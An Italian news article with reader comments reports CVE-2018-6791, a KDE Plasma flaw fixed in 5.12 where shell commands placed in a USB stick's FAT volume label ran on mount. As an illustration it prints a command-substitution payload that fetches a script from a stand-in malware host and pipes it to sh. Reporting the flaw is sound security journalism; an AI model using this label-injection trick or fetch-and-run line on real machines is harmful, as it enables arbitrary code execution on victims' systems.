Quando il nome di una chiavetta è fonte di exploit: scivolone di KDE Plasma

KDE Plasma soffriva, almeno fino a pochi giorni fa, di un curioso (e pericoloso) bug che permetteva l'esecuzione di comandi arbitrari semplicemente inserendoli nell'etichetta di chiavette USB
di Riccardo Robecchi pubblicata il 13 Febbraio 2018, alle 10:01 nel canale SicurezzaLinux
KDE Plasma, uno tra i primi ambienti desktop sviluppati per Linux, soffriva di una grave vulnerabilità ora corretta: nelle versioni precedenti alla 5.12, rilasciata pochi giorni fa, era possibile eseguire comandi arbitrari semplicemente inserendoli nell'etichetta di un dispositivo di archiviazione portatile come una chiavetta USB.
La vulnerabilità permetteva a un attaccante di eseguire comandi semplicemente inserendoli nell'etichetta di un volume FAT (FAT, FAT32, VFAT). Affinché questo fosse possibile, era necessario inserire i comandi tra i caratteri `` o $() - ad esempio `reboot` (nel caso più innocuo) o $(curl http://scaricaunmalware.com/file.sh | sh) (che scarica un file e lo esegue) - e KDE Plasma avrebbe provveduto a eseguire tale codice al collegamento del dispositivo. Ovviamente la fantasia vola in questi casi ed è facile immaginare danni anche gravi, ad esempio con comandi che possono cancellare il contenuto della cartella home o scaricare eseguibili malevoli.
La vulnerabilità, nota come CVE-2018-6791, è stata corretta con il rilascio di KDE Plasma 5.12 e, come scrive Phoronix, il team sta lavorando alla correzione anche nelle versioni precedenti ancora in uso in alcune distribuzioni.
Ovviamente è necessario avere accesso fisico alla macchina che si vuole attaccare e questo limita le possibilità di attacco, ma questo rimane un problema non da poco che il progetto KDE si è lasciato sfuggire. La vulnerabilità è stata resa nota solo dopo la diffusione dell'aggiornamento alla nuova versione dell'ambiente senza il problema.
5 Commenti
Gli autori dei commenti, e non la redazione, sono responsabili dei contenuti da loro inseriti - infoa livello più basso del d.e., se non ricordo male...
Sarebbe giusto dargli la giusta rilevanza in quanto per correttezza serve per sfatare il falso mito che un sistema operativo sia sempre sicuro per definizione.
(per la cronaca uso Linux, Windows e MacOs).
beh, cmq
https://nakedsecurity.sophos.com/20...ulnerabilities/
https://www.macitynet.it/creato-bad...ispositivo-usb/
(son 2 cose diverse)
Badusb agisce a livello ancora più basso e quindi non c'entra nessun SO, le "79 vulnerabilità" vogliono dire molto poco, dicono che linux non è sicuro in maniera assoluta ma non certo che lo sia meno di altri SO.
La sicurezza di linux non è un "falso mito", semplicemente non è un assoluto, gli assoluti nel campo della sicurezza informatica hanno vita molto breve.
Devi effettuare il login per poter commentare
Se non sei ancora registrato, puoi farlo attraverso questo form.
Se sei già registrato e loggato nel sito, puoi inserire il tuo commento.
Si tenga presente quanto letto nel regolamento, nel rispetto del "quieto vivere".